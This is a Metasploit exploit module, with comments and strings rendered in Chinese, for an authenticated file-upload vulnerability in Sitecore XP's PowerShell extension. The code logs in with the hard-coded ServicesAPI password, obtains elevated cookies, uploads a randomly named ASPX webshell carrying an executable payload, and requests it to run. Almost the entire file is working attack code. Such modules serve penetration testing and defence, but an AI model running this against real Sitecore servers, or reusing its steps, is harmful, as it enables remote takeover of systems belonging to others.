1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
|
##
# 此模块需要 Metasploit:https://metasploit.com/download
# 当前源代码:https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::SitecoreXp
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore XP CVE-2025-34511 后认证文件上传',
'Description' => %q{
此模块利用 CVE-2025-34511,这是 PowerShell 扩展中的一个文件上传漏洞。该模块还利用 CVE-2025-34509(ServicesAPI 账户的硬编码凭证)来获得初始访问权限。
},
'License' => MSF_LICENSE,
'Author' => [
'Piotr Bazydlo', # 发现者
'msutovsky-r7' # 模块创建者
],
'References' => [
[ 'CVE', '2025-34511' ],
['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667']
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[
'Windows',
{
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DisclosureDate' => '2025-06-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, '易受攻击端点的路径', '/']),
])
end
def check
return Exploit::CheckCode::Unknown('无法登录,应用程序可能不是 Sitecore') unless login_identitysrv('ServicesAPI', 'b')
@is_logged = true
return Exploit::CheckCode::Safe('无法获取提升权限的 cookies') unless get_identity_cookies
@is_elevated = true
sitecore_version = get_version
res = send_request_cgi({
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
'method' => 'GET',
'vars_get' => { 'hdl' => '1245516121' }
})
return Exploit::CheckCode::Safe('未检测到 PowerShell 扩展,目标 Sitecore 实例中可能未安装') unless res&.code == 200
return Exploit::CheckCode::Vulnerable("检测到 Sitecore 版本为 #{sitecore_version},该版本存在漏洞") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))
Exploit::CheckCode::Safe("检测到 Sitecore 版本为 #{sitecore_version},该版本不存在漏洞")
end
def upload_webshell
@webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx"
@item_uri = Rex::Text.rand_text_alpha(8)
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_aspx(exe)
data_post = Rex::MIME::Message.new
data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri"))
data_post.add_part('en', nil, nil, %(form-data; name="LanguageName"))
data_post.add_part('0', nil, nil, %(form-data; name="Overwrite"))
data_post.add_part('0', nil, nil, %(form-data; name="Unpack"))
data_post.add_part('en', nil, nil, %(form-data; name="Versioned"))
data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}"))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
'vars_get' => { 'hdl' => '1245516121' },
'data' => data_post.to_s,
'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
})
return false unless res&.code == 200
true
end
def trigger_webshell
send_request_cgi({
'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),
'method' => 'GET'
})
end
def exploit
if !@is_logged && !login_identitysrv('ServicesAPI', 'b')
fail_with(Failure::NoAccess, '登录失败,请检查凭证')
end
if !@is_elevated && !get_identity_cookies
fail_with(Failure::Unknown, '获取提升权限的 cookies 失败')
end
fail_with(Failure::PayloadFailed, '上传 webshell 失败') unless upload_webshell
trigger_webshell
end
end
|